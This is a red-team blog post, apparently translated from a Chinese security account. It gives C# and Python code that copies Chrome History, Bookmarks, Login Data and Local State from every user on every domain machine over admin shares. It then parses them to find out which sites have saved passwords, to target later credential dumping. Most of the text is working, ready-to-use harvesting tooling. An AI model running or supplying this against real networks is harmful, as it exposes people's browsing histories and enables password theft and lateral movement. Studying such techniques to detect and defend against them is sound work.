The previous post covered batch-collecting files from machines in the domain. In some engagements we need to take over one particular machine, but it only exposes ports such as 80 and 22 and cannot be shelled by the usual means, while some IT staff member's PC may be holding a password list. In other cases all we really need is admin access to the back end of one web application. On an intranet with thousands of machines, going through browser passwords one machine at a time is tedious, so instead we batch-parse, for every machine in the domain and every user on it, the Chrome bookmarks, browsing history and whether any passwords were saved, into plain text; then we go and dump passwords only on the machine that matters, which saves a lot of time.
0x01 Fetching the Chrome files
Chrome keeps the files of interest under
C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default
Bookmarks: bookmarks
History: browsing history
Login Data: saved-password records
Only the Default profile is handled below; additional profiles, if the user created any, live in sibling directories named Profile 1, Profile 2 and so on.
We follow the same approach as the earlier domain file collection, so it is not covered in detail again: create machine.txt and read the machines from it line by line.
Get the current path and create the TargetChromeFiles directory (the snippets below need using System.IO;):
string currentpath = Directory.GetCurrentDirectory();
string DesktopFiles = currentpath + "\\TargetChromeFiles";
Enumerate the Users directory of each machine over the admin share; if \\<machine>\c$\Users\<user>\AppData\Local\Google\Chrome\User Data\Default exists, create a folder for the machine name and, under it, one for the user name:
string userpath = @"\\" + machine + @"\c$\Users";
var user_list = Directory.EnumerateDirectories(userpath);
foreach (string user in user_list)
{
    string ChromePath = user + @"\AppData\Local\Google\Chrome\User Data\Default";
    string username = Path.GetFileName(user);   // last path segment, i.e. the Windows account name
    if (Directory.Exists(ChromePath))
    {
        string MachineFolder = DesktopFiles + "\\" + machine;
        Directory.CreateDirectory(MachineFolder);
        string UserFolder = MachineFolder + "\\" + username;
        Directory.CreateDirectory(UserFolder);
    }
}
Fetch the History file for that machine and user (this goes inside the if block above, where ChromePath and UserFolder are in scope):
string historyPath = ChromePath + @"\History";
if (File.Exists(historyPath))
{
    string historyfile = UserFolder + @"\History";
    File.Copy(historyPath, historyfile, true);   // true: overwrite an earlier copy
}
If the file exists it is copied out as History; Bookmarks and Login Data are handled the same way:
string loginPath = ChromePath + @"\Login Data";
if (File.Exists(loginPath))
{
    string loginfile = UserFolder + @"\Login Data";
    File.Copy(loginPath, loginfile, true);
}
string BookPath = ChromePath + @"\Bookmarks";
if (File.Exists(BookPath))
{
    string bookfile = UserFolder + @"\Bookmarks";
    File.Copy(BookPath, bookfile, true);
}
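The same collection step in Python, as an added example rather than code from the original post. It generalises the C# above in two ways: it walks every Chrome profile directory (Default and Profile N) instead of only Default, and it also grabs the per-user Local State file, which on Chrome 80 and later holds the DPAPI-wrapped AES key needed to decrypt "v10" password blobs later. The users_root argument is whatever points at the target's Users folder, \\HOST\c$\Users over an admin share in practice; the demo tree it builds in a temp directory is constructed data, and the machine name WS-01 is made up.

```python
import shutil
import tempfile
from pathlib import Path

# Chrome artefacts worth pulling from each profile directory (Default, Profile 1, ...)
PROFILE_FILES = ("Bookmarks", "History", "Login Data")
CHROME_USER_DATA = Path("AppData/Local/Google/Chrome/User Data")


def collect_chrome_artifacts(users_root, out_dir, machine):
    r"""Copy Chrome artefacts for every user and every profile under users_root.

    users_root: the target's Users folder, e.g. r'\\HOST\c$\Users' over an
                admin share (a local directory in the demo below).
    Returns a list of (user, profile, filename) tuples that were copied.
    """
    users_root, out_dir = Path(users_root), Path(out_dir)
    copied = []
    for user_dir in sorted(p for p in users_root.iterdir() if p.is_dir()):
        user_data = user_dir / CHROME_USER_DATA
        if not user_data.is_dir():
            continue                      # this account never ran Chrome
        dest_user = out_dir / machine / user_dir.name
        # Local State sits above the profiles and holds the AES key used for
        # 'v10' password blobs (itself DPAPI-protected); take it once per user.
        local_state = user_data / "Local State"
        if local_state.is_file():
            dest_user.mkdir(parents=True, exist_ok=True)
            shutil.copy2(local_state, dest_user / "Local State")
            copied.append((user_dir.name, "", "Local State"))
        for profile in sorted(p for p in user_data.iterdir() if p.is_dir()):
            if profile.name != "Default" and not profile.name.startswith("Profile "):
                continue                  # skip caches, extension dirs, etc.
            for name in PROFILE_FILES:
                src = profile / name
                if src.is_file():
                    dest = dest_user / profile.name
                    dest.mkdir(parents=True, exist_ok=True)
                    shutil.copy2(src, dest / name)
                    copied.append((user_dir.name, profile.name, name))
    return copied


def build_demo_tree(root):
    r"""Constructed stand-in for a target's C:\Users tree (demo data only)."""
    root = Path(root)
    layout = {
        "alice": {"Default": ("History", "Bookmarks")},
        "bob": {"Profile 1": ("Login Data",)},
        "svc_backup": {},                 # account that never ran Chrome
    }
    for user, profiles in layout.items():
        user_data = root / user / CHROME_USER_DATA
        for profile, files in profiles.items():
            (user_data / profile).mkdir(parents=True)
            (user_data / "Local State").write_text("{}")
            for name in files:
                (user_data / profile / name).write_bytes(b"demo")
        if not profiles:
            (root / user).mkdir(parents=True)
    return root


def demo():
    """Run the collector over the constructed tree; returns the copy manifest."""
    with tempfile.TemporaryDirectory() as tmp:
        users_root = build_demo_tree(Path(tmp) / "Users")
        out_dir = Path(tmp) / "TargetChromeFiles"
        copied = collect_chrome_artifacts(users_root, out_dir, "WS-01")
        # check the copies exist before the temp dir is removed
        present = all((out_dir / "WS-01" / u / p / f).is_file() for u, p, f in copied)
    return {"copied": copied, "all_present": present}


if __name__ == "__main__":
    for entry in demo()["copied"]:
        print(entry)
```

For a real run, call collect_chrome_artifacts(r"\\WS-01\c$\Users", "TargetChromeFiles", "WS-01") once per line of machine.txt from a context that has admin rights on the share; Chrome keeps these SQLite files locked while it runs, which is why they are copied out rather than opened in place.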
Dump result (screenshot in the original).
Login Data is stored as a SQLite database, so the next step is to batch-parse every file under the local TargetChromeFiles directory into plain text, writing the results to a local output_TargetChromeInfos directory.
First create that directory (this part needs using System.IO;, using System.Data; and using System.Data.SQLite;):
string currentpath = Directory.GetCurrentDirectory();
string getchromeinfopath = currentpath + "\\output_TargetChromeInfos";
Directory.CreateDirectory(getchromeinfopath);
Walk every machine under TargetChromeFiles and create a matching machine directory:
string ChromeFilesPath = currentpath + "\\TargetChromeFiles";
if (Directory.Exists(ChromeFilesPath))
{
    Console.ForegroundColor = ConsoleColor.Yellow;
    Console.WriteLine("[*]Parsing Chrome browser information");
    Console.ForegroundColor = ConsoleColor.White;
    var machine_list = Directory.EnumerateDirectories(ChromeFilesPath);
    foreach (string machine in machine_list)
    {
        Console.ForegroundColor = ConsoleColor.Yellow;
        string out_machine_info = Path.GetFileName(machine); // last path segment, i.e. the machine name
        Console.WriteLine("[*]" + out_machine_info);
        Console.ForegroundColor = ConsoleColor.White;
        // create the local machine folder
        string getmachinepath = getchromeinfopath + "\\" + out_machine_info;
        Directory.CreateDirectory(getmachinepath);
Then create the user directories:
        var user_list = Directory.EnumerateDirectories(machine);
        foreach (string user in user_list)
        {
            Console.ForegroundColor = ConsoleColor.Yellow;
            string out_user_info = Path.GetFileName(user);
            Console.WriteLine("    " + out_user_info);
            Console.ForegroundColor = ConsoleColor.White;
            string getuserpath = getmachinepath + "\\" + out_user_info;
            Directory.CreateDirectory(getuserpath);
Bookmarks is a JSON file, so no processing is done here: its content is copied straight into the Bookmarks file of the output directory.
            string book_path = user + @"\Bookmarks";
            if (File.Exists(book_path))
            {
                string getbookpath = getuserpath + @"\Bookmarks";
                File.Copy(book_path, getbookpath, true);
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("    [*]bookmarks parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("    [-]bookmarks not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
If you want it to look nicer, the following Python tidies the JSON up: Chrome's Bookmarks file has a "roots" object (bookmark_bar, other, synced), each a folder whose "children" are either further folders or entries of type "url" carrying "name" and "url".
import json

BOOKMARKS = r'C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\Default\Bookmarks'

def walk(node, depth=0):
    # folders carry "children"; leaves of type "url" carry "name" and "url"
    if node.get("type") == "url":
        print("  " * depth + node.get("name", "") + "  " + node["url"])
    for child in node.get("children", []):
        walk(child, depth + 1)

with open(BOOKMARKS, encoding="utf-8") as f:
    data = json.load(f)

for root in data["roots"].values():
    if isinstance(root, dict):   # skip non-folder entries some versions keep under roots
        walk(root)
Looking at the History database (screenshot in the original), we pull out only the fields we want from its urls table:
            string History_path = user + @"\History";
            if (File.Exists(History_path))
            {
                string gethistorypath = getuserpath + @"\History.txt";
                // open the copied database read-only; title can be NULL in the urls table
                SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + History_path + ";Read Only=True");
                connect.Open();
                SQLiteCommand fcmd = connect.CreateCommand();
                fcmd.CommandText = @"select * from urls";
                fcmd.CommandType = CommandType.Text;
                SQLiteDataReader r = fcmd.ExecuteReader();
                string HistoryHostof = "host:" + out_machine_info + "\r\n";
                string HistoryMemberof = "user:" + out_user_info + "\r\n\r\n";
                File.AppendAllText(gethistorypath, HistoryHostof);
                File.AppendAllText(gethistorypath, HistoryMemberof);
                while (r.Read())
                {
                    string title = r["title"] as string ?? "";
                    string out_title = "title:" + title + "\r\n";
                    string url = (string)r["url"];
                    string out_url = "url:" + url + "\r\n\r\n";
                    File.AppendAllText(gethistorypath, out_title);
                    File.AppendAllText(gethistorypath, out_url);
                }
                connect.Close();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("    [*]history parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("    [-]history not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
Working with SQLite from C# is not covered further here; there is plenty of sample code and tutorials online (the System.Data.SQLite package is used above).
Finally, the saved-password records in Login Data (the logins table):
            string LoginData_path = user + @"\Login Data";
            if (File.Exists(LoginData_path))
            {
                string getloginypath = getuserpath + @"\Login Data.txt";
                SQLiteConnection connect = new SQLiteConnection(@"Data Source=" + LoginData_path + ";Read Only=True");
                connect.Open();
                SQLiteCommand fcmd = connect.CreateCommand();
                fcmd.CommandText = @"select * from logins";
                fcmd.CommandType = CommandType.Text;
                SQLiteDataReader r = fcmd.ExecuteReader();
                string LoginHostof = "host:" + out_machine_info + "\r\n";
                string LoginMemberof = "user:" + out_user_info + "\r\n\r\n";
                File.AppendAllText(getloginypath, LoginHostof);
                File.AppendAllText(getloginypath, LoginMemberof);
                while (r.Read())
                {
                    string origin_url = (string)r["origin_url"];
                    string out_origin_url = "origin_url:" + origin_url + "\r\n";
                    string action_url = r["action_url"] as string ?? "";
                    string out_action_url = "action_url:" + action_url + "\r\n";
                    Int64 blacklisted_by_user = (Int64)r["blacklisted_by_user"];
                    string out_blacklisted_by_user = "blacklisted_by_user:" + blacklisted_by_user + "\r\n";
                    File.AppendAllText(getloginypath, out_origin_url);
                    File.AppendAllText(getloginypath, out_action_url);
                    File.AppendAllText(getloginypath, out_blacklisted_by_user);
                }
                connect.Close();
                Console.ForegroundColor = ConsoleColor.Green;
                Console.WriteLine("    [*]login data parse success");
                Console.ForegroundColor = ConsoleColor.White;
            }
            else
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("    [-]login data not found");
                Console.ForegroundColor = ConsoleColor.White;
            }
When blacklisted_by_user is 1, the user chose "Never save" for that site and the row carries no credential; when it is 0, a credential is saved for that site. Note that the password_value column of a saved row is not plaintext: it is protected with DPAPI under the user's logon secret (on Chrome 80 and later, with an AES-GCM key that is itself stored DPAPI-wrapped in the Local State file). The collected file therefore tells you where a password exists, and the actual dump still has to be done in that user's context on that machine, as described in the introduction.
The test environment here is my own machine; it has also been run in many authorized engagements and no problems have turned up so far.
Final result (screenshot in the original).
Originally published on the WeChat public account 红队蓝军: Batch parsing Chrome browsers across the domain